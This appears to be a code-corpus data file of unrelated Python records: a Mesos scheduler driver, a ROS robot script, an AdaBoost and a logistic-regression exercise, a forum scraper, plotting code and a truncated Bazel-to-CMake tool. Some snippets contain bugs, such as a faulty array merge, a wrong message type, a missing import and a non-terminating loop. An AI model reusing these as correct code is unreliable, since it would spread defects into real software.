@ignore_if_disconnected\n def kill_task(self, task_id):\n assert self.master is not None\n message = mesos.internal.KillTaskMessage(framework_id=self.framework.id, task_id=task_id)\n self.send(self.master, message)\n\n @ignore_if_disconnected\n def request_resources(self, requests):\n assert self.master is not None\n message = mesos.internal.ResourceRequestMessage(\n framework_id=self.framework.id,\n requests=requests,\n )\n self.send(self.master, message)\n\n def launch_tasks(self, offer_ids, tasks, filters=None):\n # TODO(tarnfeld): Implement this, we need to tell the framework that the\n # tasks were lost.\n def task_lost(task):\n pass\n\n if not isinstance(offer_ids, list):\n offer_ids = [offer_ids]\n\n assert len(offer_ids) > 0\n\n if filters is None:\n filters = mesos.Filters()\n\n lost_tasks = False\n\n # Perform some sanity checking on the tasks before launching them\n for task in tasks:\n if not self.connected.is_set():\n task_lost(task)\n lost_tasks = True\n continue\n if task.HasField('executor') == task.HasField('command'):\n log.error('A task must have either an executor or command')\n task_lost(task)\n lost_tasks = True\n continue\n if task.HasField('executor') and task.executor.HasField('framework_id') \\\n and task.executor.framework_id.value != self.framework.id.value:\n log.error('Executor has an invalid framework ID')\n task_lost(task)\n lost_tasks = True\n continue\n if task.HasField('executor') and not task.executor.HasField('framework_id'):\n task.executor.framework_id.value = self.framework.id.value\n\n if lost_tasks:\n return\n\n message = mesos.internal.LaunchTasksMessage(\n framework_id=self.framework.id,\n tasks=tasks,\n filters=filters,\n )\n\n for offer_id in offer_ids:\n field = message.offer_ids.add()\n field.value = offer_id.value\n\n self.send(self.master, message)\n\n @ignore_if_disconnected\n def revive_offers(self):\n assert self.master is not None\n message = mesos.internal.ReviveOffersMessage(framework_id=self.framework.id)\n self.send(self.master, message)\n\n @ignore_if_disconnected\n def send_framework_message(self, executor_id, slave_id, data):\n assert executor_id is not None\n assert slave_id is not None\n assert data is not None\n message = mesos.internal.FrameworkToExecutorMessage(\n framework_id=self.framework.id,\n executor_id=executor_id,\n slave_id=slave_id,\n data=data,\n )\n self.send(self.master, message)\n\n @ignore_if_disconnected\n def reconcile_tasks(self, statuses):\n assert self.master is not None\n message = mesos.internal.ReviveOffersMessage(framework_id=self.framework.id, statuses=statuses)\n self.send(self.master, message)\n\n del ignore_if_aborted\n\n\nclass PesosSchedulerDriver(SchedulerDriver):\n def __init__(self, scheduler, framework, master_uri, credential=None, context=None):\n self.context = context or Context.singleton()\n self.scheduler = scheduler\n self.scheduler_process = None\n self.master_uri = master_uri\n self.framework = framework\n self.lock = threading.Condition()\n self.status = mesos.DRIVER_NOT_STARTED\n self.detector = None\n self.credential = credential\n\n def locked(method):\n @functools.wraps(method)\n def _wrapper(self, *args, **kw):\n with self.lock:\n return method(self, *args, **kw)\n return _wrapper\n\n def _initialize_detector(self):\n if self.master_uri.startswith(\"zk:\"):\n raise Exception(\"The zookeeper master detector is not supported\")\n\n return StandaloneMasterDetector(self.master_uri)\n\n @locked\n def start(self):\n if self.status is not mesos.DRIVER_NOT_STARTED:\n return self.status\n\n if self.detector is None:\n self.detector = self._initialize_detector()\n\n assert self.scheduler_process is None\n self.scheduler_process = SchedulerProcess(\n self,\n self.scheduler,\n self.framework,\n self.credential,\n self.detector,\n )\n self.context.spawn(self.scheduler_process)\n self.status = mesos.DRIVER_RUNNING\n return self.status\n\n @locked\n def stop(self, failover=False):\n if self.status not in (mesos.DRIVER_RUNNING, mesos.DRIVER_ABORTED):\n return self.status\n\n if self.scheduler_process is not None:\n self.context.dispatch(self.scheduler_process.pid, 'stop', failover)\n\n aborted = self.status == mesos.DRIVER_ABORTED\n self.status = mesos.DRIVER_STOPPED\n self.lock.notify()\n return mesos.DRIVER_ABORTED if aborted else self.status\n\n @locked\n def abort(self):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n\n assert self.scheduler_process is not None\n self.scheduler_process.aborted.set()\n self.context.dispatch(self.scheduler_process.pid, 'abort')\n self.status = mesos.DRIVER_ABORTED\n self.lock.notify()\n return self.status\n\n @locked\n def join(self):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n\n while self.status is mesos.DRIVER_RUNNING:\n self.lock.wait() # Wait until the driver notifies us to break\n\n log.info(\"Scheduler driver finished with status %d\", self.status)\n assert self.status in (mesos.DRIVER_ABORTED, mesos.DRIVER_STOPPED)\n return self.status\n\n @locked\n def run(self):\n self.status = self.start()\n return self.status if self.status is not mesos.DRIVER_RUNNING else self.join()\n\n @locked\n def requestResources(self, requests):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n assert self.scheduler_process is not None\n self.context.dispatch(self.scheduler_process.pid, 'request_resources', requests)\n return self.status\n\n @locked\n def launchTasks(self, offer_ids, tasks, filters=None):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n assert self.scheduler_process is not None\n self.context.dispatch(self.scheduler_process.pid, 'launch_tasks', offer_ids, tasks, filters)\n return self.status\n\n @locked\n def killTask(self, task_id):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n assert self.scheduler_process is not None\n self.context.dispatch(self.scheduler_process.pid, 'kill_task', task_id)\n return self.status\n\n @locked\n def declineOffer(self, offer_id, filters=None):\n return self.launch_tasks(offer_id, [], filters)\n\n @locked\n def reviveOffers(self):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n assert self.scheduler_process is not None\n self.context.dispatch(self.scheduler_process.pid, 'revive_offers')\n return self.status\n\n @locked\n def sendFrameworkMessage(self, executor_id, slave_id, data):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n assert self.scheduler_process is not None\n self.context.dispatch(\n self.scheduler_process.pid,\n 'send_framework_message',\n executor_id,\n slave_id,\n data,\n )\n return self.status\n\n @locked\n def reconcileTasks(self, statuses):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n assert self.scheduler_process is not None\n self.context.dispatch(self.scheduler_process.pid, 'reconcile_tasks', statuses)\n return self.status\n\n # idiomatic snake_case aliases.\n request_resources = requestResources\n launch_tasks = launchTasks\n kill_task = killTask\n decline_offer = declineOffer\n revive_offers = reviveOffers\n send_framework_message = sendFrameworkMessage\n reconcile_tasks = reconcileTasks\n","sub_path":"pesos/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":15877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"608830533","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport xlrd\n\ndata = xlrd.open_workbook('excelfile.xlsx')\ntable1 = data.sheets()[0]\nl1=table1.row_values(0)\njf=set()\n# canvas=\n# def dealit(li):\n\n\t# draw rectangle from li[2] li[3]\n#draw a line\ndef drawRectangle(x = 0.0, y = 0.0, width = 10.0, height = 10.0, color = \"black\"):\n turtle.penup()\n turtle.goto(x + width / 2.0, y + height / 2.0)\n turtle.color(color)\n turtle.pendown()\n for i in range(0, 2):\n turtle.right(90)\n turtle.forward(height)\n turtle.right(90)\n turtle.forward(width)\n turtle.penup()","sub_path":"excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"253559943","text":"#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import Twist\nPI = 3.1415926535897\n\ndef rotate():\n\n #Starts a new node\n rospy.init_node('vel_club', anonymous=True)\n velocity_publisher = rospy.Publisher('/cmd_vel', Twist, queue_size=10)\n vel_msg = Twist()\n vel = 0.2\n\n # Receiveing the user's input\n print(\"Let's make a circle\")\n Radius = 0.2\n\n \n vel_msg.linear.x= vel\n vel_msg.linear.y=0\n vel_msg.linear.z=0\n vel_msg.angular.x = 0\n vel_msg.angular.y = 0\n\n t0 = float(rospy.Time.now().to_sec())\n current_distance = 0\n\n \n while(current_distance < Radius):\n \n velocity_publisher.publish(vel_msg)\n \n t1=float(rospy.Time.now().to_sec())\n \n current_distance= (vel)*(t1-t0)\n \n vel_msg.linear.x = 0\n \n velocity_publisher.publish(vel_msg)\n\n angular_speed = abs(90*2*PI/360)\n vel_msg.angular.z = angular_speed\n\n t00 = rospy.Time.now().to_sec()\n current_angle = 0\n relative_angle = 90*2*PI/360\n\n while(current_angle < relative_angle):\n velocity_publisher.publish(vel_msg)\n t11 = rospy.Time.now().to_sec()\n current_angle = angular_speed*(t11-t00)\n\n\n vel_msg.angular.z = 0\n velocity_publisher.publish(vel_msg)\n \n dist = 5\n k = 0\n \n while (k < dist):\n vel_msg.linear.x= vel\n vel_msg.angular.z = (vel)/(Radius)\n velocity_publisher.publish(vel_msg)\n \n rospy.spin()\n\nif __name__ == '__main__':\n try:\n # Testing our function\n rotate()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"catkin_ws/src/assignment_3/src/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"324213111","text":"import matplotlib.pyplot as plt\nimport os\nimport csv\nimport numpy as np\n\nfiles = os.listdir('data/')\nparams = []\ntime_values = []\neuler_values = []\nquaternion_values = []\n\nfor file in files:\n with open('data/'+file, encoding='utf-8-sig') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n times = []\n euler_angles = []\n quaternion_angles = []\n\n params.append(file.split('.csv')[0].split('-'))\n \n for row in readCSV:\n times.append(int(row[0]))\n euler_angles.append(float(row[1]))\n quaternion_angles.append(float(row[2]))\n\n times[:] = [val - times[0] for val in times]\n euler_angles[:] = [val - euler_angles[0] for val in euler_angles]\n quaternion_angles[:] = [val - quaternion_angles[0] for val in quaternion_angles]\n \n time_values.append(times)\n euler_values.append(euler_angles)\n quaternion_values.append(quaternion_angles)\n \nfor i in range(len(params)):\n plt.figure()\n plt.grid()\n plt.xlim(0, time_values[i][-1])\n plt.plot(time_values[i], euler_values[i], label='Euler Angle')\n plt.plot(time_values[i], quaternion_values[i], label = 'Quaternion Angle')\n plt.legend()\n plt.xlabel('Time (ms)')\n plt.ylabel('Deviation (degrees)')\n title_string = 'Base Gain: ' + params[i][0] + ' Low Threshold: ' + params[i][1] + ' High Threshold: ' + params[i][2] + r\" $\\varepsilon$: \" + params[i][3]\n plt.title(title_string)\n plt.savefig('plots/'+files[i].split('.csv')[0]+'.png')\n \n","sub_path":"Tests/generate_graphs.py","file_name":"generate_graphs.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"461630795","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nurl = 'https://www.ptt.cc/bbs/NBA/index.html'\r\n\r\npttDomain = 'https://www.ptt.cc'\r\nlastPage = ''\r\ncategory = ''\r\n\r\n# 連線檢查\r\ndef connectionCheck(html):\r\n if html.status_code != requests.codes.ok:\r\n return False\r\n else:\r\n return True\r\n\r\n# 撈取網頁資料並打印\r\ndef getPageData(url):\r\n html = requests.get(url)\r\n \r\n if connectionCheck(html):\r\n soup = BeautifulSoup(html.content , 'html.parser')\r\n # PTT右上區塊按鈕\r\n menuDiv = soup.find('div' , class_='btn-group btn-group-paging')\r\n\r\n lastLinks = menuDiv.find_all('a')\r\n # 抓取上頁的URL\r\n for lastLink in lastLinks:\r\n if '上頁' in lastLink.string:\r\n global lastPage\r\n lastPage = lastLink.get('href')\r\n \r\n content = soup.find('div' , class_='r-list-container action-bar-margin bbs-screen')\r\n \r\n # 最新文章頁面 公告板規分隔線\r\n r_list_sep = content.find('div' , class_='r-list-sep')\r\n \r\n if r_list_sep == None:\r\n r_ent_div = content.find_all('div' , class_ = 'r-ent')\r\n else:\r\n r_ent_div = r_list_sep.find_previous_siblings('div' , class_ ='r-ent' )\r\n\r\n i = 0\r\n for item in r_ent_div:\r\n title = item.find('div' , class_='title')\r\n if title.find('a'):\r\n s = title.find('a')\r\n titleText = s.string\r\n a = s.get('href')\r\n date = item.find('div' , class_='date').string\r\n\r\n global category\r\n if category in titleText :\r\n i = i+1\r\n print('#{} 標題:{} 發文日期:{} \\n #連結:https://www.ptt.cc{}' . format(i , titleText , date , a))\r\n return \r\n \r\n else:\r\n print('無法連線網站')\r\n return\r\n\r\n\r\nwhile True:\r\n try:\r\n page = int(input('請輸入要搜尋的頁數:'))\r\n break\r\n except:\r\n print('請輸入數字!')\r\n \r\nsearchRange = range(1 , page +1)\r\ncategory = '['+input('請輸入要搜尋的類別:')+']'\r\n\r\nfor num in searchRange:\r\n if num == 1:\r\n getPageData(url)\r\n else:\r\n url = pttDomain + lastPage\r\n getPageData(url)\r\n\r\n\r\n","sub_path":"KUO_LUN/write/30 python/Beautiful Soup/B_soup_ptt_multi_page.py","file_name":"B_soup_ptt_multi_page.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"101394725","text":"# coding: UTF-8\r\nimport sys\r\nimport pyqtgraph as pg\r\nfrom PySide import QtCore, QtGui\r\nimport numpy as np\r\nimport re\r\nfrom configobj import ConfigObj\r\n\r\nclass AboutWidget(QtGui.QWidget):\r\n\tdef __init__(self):\r\n\t\tsuper(AboutWidget,self).__init__(None,\r\n\t\t# QtCore.Qt.WindowStaysOnTopHint)\r\n\t\t\t)\r\n\t\tself.setupGUI()\r\n\tdef setupGUI(self):\r\n\t\tself.setWindowTitle(\"About GeoTravis\")\r\n\t\tself.setWindowIcon(QtGui.QIcon('images/Logo.png'))\r\n\t\t# self.setGeometry(500, 300, 350, 200)\r\n\t\tself.layout = QtGui.QHBoxLayout()\r\n\t\tself.setLayout(self.layout)\r\n\t\tself.image = QtGui.QPixmap()\r\n\t\tself.image.load('./images/Logo.png')\r\n\t\tself.image = self.image.scaled(200, 200, \r\n\t\t\tQtCore.Qt.KeepAspectRatio) \r\n\t\t# self.image.scaled(100, 200, QtCore.Qt.IgnoreAspectRatio) \r\n\t\tself.imgLabel = QtGui.QLabel(self)\r\n\t\t# self.imgLabel.setScaledContents(True)\r\n\t\tself.imgLabel.resize(110,102)\r\n\t\tself.imgLabel.setPixmap(self.image)\r\n\t\tself.textLable = QtGui.QLabel(self)\r\n\t\tself.textLable.setText('GeoTravis is awesome!!!\\n'*15)\r\n\t\tself.layout.addWidget(self.imgLabel)\r\n\t\tself.layout.addWidget(self.textLable)\r\n\r\nif __name__ == '__main__':\r\n\tApp = QtGui.QApplication(sys.argv)\r\n\tw = AboutWidget()\r\n\tw.setWindowIcon(QtGui.QIcon('../images/Logo.png'))\r\n\t# w.image.load('../images/Logo.png')\r\n\t# w.imgLabel.setPixmap(w.image)\r\n\tw.show()\r\n\tApp.exec_()","sub_path":"lib/AboutWidget.py","file_name":"AboutWidget.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"590387523","text":"def mergeArrays(arr1, arr2, n1, n2):\n arr3 = [None] * (n1+n2)\n i = 0;\n j = 0;\n k = 0;\n\n while i < n1 and j < n1:\n if arr1[i] < arr2[j]:\n arr3[k] = arr1[i]\n i = i + 1;\n k = k + 1;\n\n if arr1[i] > arr2[j]:\n arr3[k] = arr2[j]\n j = j + 1;\n k = k + 1;\n\n while i < n1:\n arr3[k] = arr1[i]\n i = i + 1;\n k = k + 1;\n\n while j < n2:\n arr3[k] = arr2[j]\n j = j + 1;\n k = k + 1; \n print(\"Array after merging\") \n for i in range(n1 + n2): \n print(str(arr3[i]), end = \" \") \n\narr1 = [0, 3, 4, 31] \nn1 = len(arr1) \n \narr2 = [4, 6, 30] \nn2 = len(arr2) \nmergeArrays(arr1, arr2, n1, n2)\n","sub_path":"src/Training_codes/MergeSortedArrays.py","file_name":"MergeSortedArrays.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"23940164","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\npath='./ex2data2.txt'\ndata=pd.read_csv(path,header=None,names=['t1','t2','ac'])\n# print(data.head())\n\npositive=data[data['ac'].isin([1])]\nnegative=data[data['ac'].isin([0])]\n\n\nplt.scatter(positive['t1'],positive['t2'],s=50,c='b',marker='o')\nplt.scatter(negative['t1'],negative['t2'],s=50,c='r',marker='x')\nplt.legend(['positive','negative'])#图例:positive,negative\nplt.xlabel('t1')\nplt.ylabel('t2')\n# plt.show()\n\ndegree=5\nx1=data['t1']\nx2=data['t2']\ndata.insert(3,'ones',1)\nfor i in range(1,degree):\n for j in range(0,i):\n data['F'+str(i)+str(j)]=np.power(x1,i-j)*np.power(x2,j)#创建一组多项式特征\ndata.drop('t1',axis=1,inplace=True)#就地删除两列t1和t2\ndata.drop('t2',axis=1,inplace=True)\n# print(data.head())\n\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\ndef costReg(theta,X,y,alpha):\n theta=np.matrix(theta)\n X=np.matrix(X)\n y=np.matrix(y)\n first=np.multiply(-y,np.log(sigmoid(X*theta.T)))\n second=np.multiply((1-y),np.log(1-sigmoid(X*theta.T)))\n reg=alpha*(theta*theta.T-theta[0,0]*theta[0,0])/len(X)/2 #reg为正则化函项(不对theat0进行正则化)\n # reg = (alpha / (2 * len(X))) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2))\n return (np.sum(first-second)/len(X)+reg).getA()[0][0]#len是维度\n\n\ndef gradientReg(theta,X,y,alpha):\n theta=np.matrix(theta)\n X=np.matrix(X)\n y=np.matrix(y)\n paramaters=theta.shape[1]#获取theta的列数\n grad=np.zeros(paramaters) #y一维数组\n\n error=sigmoid(X*theta.T)-y\n\n for j in range(paramaters):\n term=np.multiply(error,X[:,j])\n if(j==0):\n grad[j]=np.sum(term)/len(X)\n else:\n grad[j]=np.sum(term)/len(X)+alpha/len(X)*theta[:,j]\n return grad\n\ndef gradientReg_without_loop(theta,X,y,alpha,lambd=1):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n error = sigmoid(X * theta.T) - y\n grad=(alpha*X.T*error/len(X)).T+alpha*lambd/len(X)*theta\n #theta0没有被正则化\n grad[0,0]=np.sum(np.multiply(error,X[:,0]))/len(X)\n #或者grad[0,0]=np.sum(error)/len(X) 因为X[:,0]全为1\n return np.array(grad).ravel()\n\ncols=data.shape[1]\nx=data.iloc[:,1:cols]\ny=data.iloc[:,0:1]\nX=np.matrix(x.values)\ny=np.matrix(y.values)\ntheta=np.zeros(11)\n\n\nalpha=1\nprint(costReg(theta,X,y,alpha))\nprint(gradientReg(theta,X,y,alpha))\n\nimport scipy.optimize as opt\nresult=opt.fmin_tnc(func=costReg,x0=theta,fprime=gradientReg_without_loop,args=(X,y,alpha))\n# result=opt.fmin_tnc(func=costReg,x0=theta,fprime=gradientReg,args=(X,y,alpha))\nprint(result)","sub_path":"ex2/ex2_2/ex2_2.py","file_name":"ex2_2.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"164647370","text":"# -*- encoding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef loadSimpData():\n dataMat = np.matrix([[1., 2.1], [2., 1.1], [1.3, 1.], [1., 1.], [2., 1.]])\n classLabels = [1.0, 1.0, -1.0, -1.0, 1.0]\n return dataMat, classLabels\n\ndef stumpClassify(dataMatrix, dimen, threshVal, threshIneq):\n retArray = np.ones((np.shape(dataMatrix)[0], 1))\n if threshIneq == 'lt':\n retArray[dataMatrix[:, dimen] <= threshVal] = -1.0\n else:\n retArray[dataMatrix[:, dimen] > threshVal] = 1.0\n return retArray\n\n'''\n单层决策树生成函数\n'''\ndef buildStump(dataArr, classLabels, D):\n dataMatrix = np.mat(dataArr)\n labelMatrix = np.mat(classLabels).T\n m, n = np.shape(dataMatrix) #(5, 2)\n numSteps = 10.0\n # 用于存储给定权重向量D时所得到的最佳单层决策树的相关信息\n bestStump = {}\n bestClasEst = np.mat(np.zeros((m, 1)))\n minError = np.inf\n # 在所有数据集的特征上进行遍历\n for i in range(n):\n rangeMin = dataMatrix[:, i].min()\n rangeMax = dataMatrix[:, i].max()\n # 通过最大值和最小值计算步长\n stepSize = (rangeMax - rangeMin) / numSteps\n for j in range(-1, int(numSteps) + 1):\n for inequal in ['lt', 'gt']:\n # 设置阈值\n threshVal = rangeMin + float(j) * stepSize\n # 根据数据集,特征,阈值计算返回分类预测结果\n predictedVals = stumpClassify(dataMatrix, i, threshVal, inequal)\n # 构建列向量,如果predicatedVals中的值不等于labelMatrix中的真正类别标签值,那么errArr的相应位置为1\n errArr = np.mat(np.ones((m, 1)))\n errArr[predictedVals == labelMatrix] = 0\n # 错误向量errArr和权重向量D的相应元素相乘并求和,得到weightedError\n weightedError = D.T * errArr\n ##print('split: dim %d, thresh %.2f, thresh inequal: %s, the weighted error is %.3f' %(i, threshVal, inequal, weightedError))\n # 将当前的错误率与巳有的最小错误率进行对比,如果当前的值较小,那么就在词典bestStump中保存该单层决策树\n if weightedError < minError:\n minError = weightedError\n bestClasEst = predictedVals.copy()\n bestStump['dim'] = i\n bestStump['thresh'] = threshVal\n bestStump['ineq'] = inequal\n return bestStump, minError, bestClasEst\n \ndataArr, classLabels = loadSimpData()\nD = np.mat(np.ones((5, 1)) / 5)\nbestStump, minError, bestClasEst = buildStump(dataArr, classLabels, D)\n##print(bestStump)\n##print(minError)\n##print(bestClasEst)\n\ndef adaBoostTrainDS(dataArr, classLabels, numIt=40):\n weakClassArr = []\n m = np.shape(dataArr)[0]\n # 向量D包含每个数据点的权重,一开始初始化相等的值\n D = np.mat(np.ones((m, 1)) / m)\n # 记录每个数据点的类别估计累计值\n aggClassEst = np.mat(np.zeros((m, 1)))\n for i in range(numIt):\n # 利用buildStump()函数找到最佳的单层决策树\n # 利用D得到的具有最小错误率的单层决策树,同时返回的还有最小的错误率以及估计的类别向量\n bestStump, error, classEst = buildStump(dataArr, classLabels, D)\n ##print('D: ', D.T)\n ##print('error: ', error)\n # 总分类器本次单层决策树输出结果的权重 alpha = 0.5 * log((1.0-error) / error)\n alpha = float(0.5 * np.log((1.0 - error) / max(error, 1e-16)))\n bestStump['alpha'] = alpha\n # 将最佳单层决策树加入到单层决策树数组\n weakClassArr.append(bestStump)\n ##print('classEst: ', classEst.T)\n expon = np.multiply(-1 * alpha * np.mat(classLabels).T, classEst)\n # 在迭代中,AdaBoost算法会在增加错分数据的权重的同时,降低正确分类数据的权重。D是一个概率分布向量,所有元素之和为1.0\n D = np.multiply(D, np.exp(expon))\n D = D / D.sum()\n # 通过aggClassESt变量保持一个运行时的类别估计值来实现\n aggClassEst += alpha * classEst\n ##print('aggClassEst: ', aggClassEst.T)\n aggErrors = np.multiply(np.sign(aggClassEst) != np.mat(classLabels).T, np.ones((m, 1)))\n errorRate = aggErrors.sum() / m\n print('total error: ', errorRate)\n if errorRate == 0.0:\n break\n return weakClassArr, aggClassEst\n\ndataArr, classLabels = loadSimpData()\nclassifierArray = adaBoostTrainDS(dataArr, classLabels, 9)\n##print(classifierArray)\n'''\n[{'dim': 0, 'thresh': 1.3, 'ineq': 'lt', 'alpha': 0.6931471805599453}, \n {'dim': 1, 'thresh': 1.0, 'ineq': 'lt', 'alpha': 0.9729550745276565}, \n{'dim': 0, 'thresh': 0.9, 'ineq': 'lt', 'alpha': 0.8958797346140273}]\n'''\n\n'''\n利用训练出的多个弱分类器进行分类\n'''\ndef adaClassify(datToClass, classifierArr):\n dataMatrix = np.mat(datToClass)\n m = np.shape(dataMatrix)[0]\n aggClassEst = np.mat(np.zeros((m, 1)))\n for i in range(len(classifierArr)):\n classEst = stumpClassify(dataMatrix, classifierArr[i]['dim'], classifierArr[i]['thresh'], classifierArr[i]['ineq'])\n # 每个弱分类器的结果以其对应的alpha值作为权重。所有这些弱分类器的结果加权求和就得到了最后的结果\n aggClassEst += classifierArr[i]['alpha'] * classEst\n ##print('aggClassEst: ', aggClassEst)\n # 返回aggClassEst的符号, 即如果aggClassEst大于0则返回+1,而如果小于0则返回-1\n return np.sign(aggClassEst)\n\n##dataArr, labelArr = loadSimpData()\n##classifierArray = adaBoostTrainDS(dataArr, labelArr, 30)\n##print(classifierArray)\n##print('ada classify1: ', adaClassify([0, 0], classifierArray))\n##print('ada classify2: ', adaClassify([[5, 5], [0, 0]], classifierArray))\n\ndef loadDataSet(fileName):\n numFeat = len(open(fileName).readline().split('\\t'))\n dataMatrix = []\n labelMatrix = []\n fr = open(fileName)\n for line in fr.readlines():\n lineArr = []\n curLine = line.strip().split('\\t')\n for i in range(numFeat - 1):\n lineArr.append(float(curLine[i]))\n dataMatrix.append(lineArr)\n labelMatrix.append(float(curLine[-1]))\n return dataMatrix, labelMatrix\n\ndataArr, labelArr = loadDataSet('horseColicTraining.txt')\nclassifierArray, aggClassEst = adaBoostTrainDS(dataArr, labelArr, 10)\n\ntestArr, testLabelArr = loadDataSet('horseColicTest.txt')\nprediction10 = adaClassify(testArr, classifierArray)\nerrArr = np.mat(np.ones((len(prediction10), 1)))\nnumErr = errArr[prediction10 != np.mat(testLabelArr).T].sum()\nnumRate = float(numErr) / len(prediction10)\nprint('预测错误数量: %d, 预测错误率: %.2f' %(numErr, numRate))\n\n'''\nROC曲线的绘制以及AUC计算函数\n'''\ndef plotROC(predStrengths, classLabels):\n # 当前坐标点位置\n currPoint = (1.0, 1.0)\n ySum = 0.0\n # 正例数量\n numPositiveClass = sum(np.array(classLabels) == 1.0)\n # x/y坐标轴上的步进数目\n yStep = 1 / float(numPositiveClass)\n xStep = 1 / float(len(classLabels) - numPositiveClass)\n # 将预测值的索引按照从小到大的顺序排序\n sortedIndicies = predStrengths.argsort()\n fig = plt.figure()\n fig.clf()\n ax = plt.subplot(111)\n for index in sortedIndicies.tolist()[0]:\n # 当遍历表时,每得到一个标签为1.0的类,则要沿着y轴的方向下降一个步长,即不断降低真阳率\n if classLabels[index] == 1.0:\n delX = 0\n delY = yStep\n # 类似地,对于每个其他类别的标签,则是在x方向上倒退了一个步长(假阴率方向)\n else:\n delX = xStep\n delY = 0\n # 所有高度的和(ySum)随着x轴的每次移动而渐次增加\n ySum += currPoint[1]\n ax.plot([currPoint[0], currPoint[0] - delX], [currPoint[1], currPoint[1] - delY], c='b')\n currPoint = (currPoint[0] - delX, currPoint[1] - delY)\n ax.plot([0, 1], [0, 1], 'b--')\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC curve for AdaBoost Horse Colic Detection System')\n ax.axis([0, 1, 0, 1])\n plt.show()\n print('Area Under Curve(AUC): %.3f' %(ySum * xStep))\n \ndataArr, labelArr = loadDataSet('horseColicTraining.txt')\nclassifierArray, aggClassEst = adaBoostTrainDS(dataArr, labelArr, 10)\nplotROC(aggClassEst.T, labelArr)","sub_path":"02.机器学习实战/07.AdaBoost元算法/codes/adaboost.py","file_name":"adaboost.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"521213230","text":"from collections import Counter\n\nf = open('Assignment_text.txt', 'r')\n\ntop_5 = {}\nfor line in f:\n if line.find(\"coffee\") > 0:\n bag_list = [v for v in line.split(\",\")[1:-1] if v and v != 'coffee']\n\n for item in bag_list:\n if top_5.get(item) is None:\n top_5[item] = 1\n else:\n top_5[item] += 1\n\ncnt = Counter(top_5)\nprint(cnt.most_common(n=5))\n\nf.close()\n","sub_path":"python-study/Assignment_naver_kin_1.py","file_name":"Assignment_naver_kin_1.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"275186173","text":"#!/usr/bin/env python3\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"This script assists with converting from Bazel BUILD files to CMakeLists.txt.\n\nBazel BUILD files should, where possible, be written to use simple features\nthat can be directly evaluated and avoid more advanced features like\nvariables, list comprehensions, etc.\n\nGenerated CMake files will be similar in structure to their source BUILD\nfiles by using the functions in build_tools/cmake/ that imitate corresponding\nBazel rules (e.g. cc_library -> iree_cc_library.cmake).\n\nFor usage, see:\n python3 build_tools/bazel_to_cmake/bazel_to_cmake.py --help\n\"\"\"\n# pylint: disable=missing-docstring\n\nimport argparse\nimport datetime\nimport os\nimport re\nimport sys\n\nimport bazel_to_cmake_converter\n\nrepo_root = None\n\nEDIT_BLOCKING_PATTERN = re.compile(\n r\"bazel[\\s_]*to[\\s_]*cmake[\\s_]*:?[\\s_]*do[\\s_]*not[\\s_]*edit\",\n flags=re.IGNORECASE)\n\n\ndef parse_arguments():\n global repo_root\n\n parser = argparse.ArgumentParser(\n description=\"Bazel to CMake conversion helper.\")\n parser.add_argument(\"--preview\",\n help=\"Prints results instead of writing files\",\n action=\"store_true\",\n default=False)\n parser.add_argument(\n \"--allow_partial_conversion\",\n help=\"Generates partial files, ignoring errors during conversion\",\n action=\"store_true\",\n default=False)\n\n # Specify only one of these (defaults to --root_dir=iree).\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"--dir\",\n help=\"Converts the BUILD file in the given directory\",\n default=None)\n group.add_argument(\n \"--root_dir\",\n help=\"Converts all BUILD files under a root directory (defaults to iree/)\",\n default=\"iree\")\n\n args = parser.parse_args()\n\n # --dir takes precedence over --root_dir.\n # They are mutually exclusive, but the default value is still 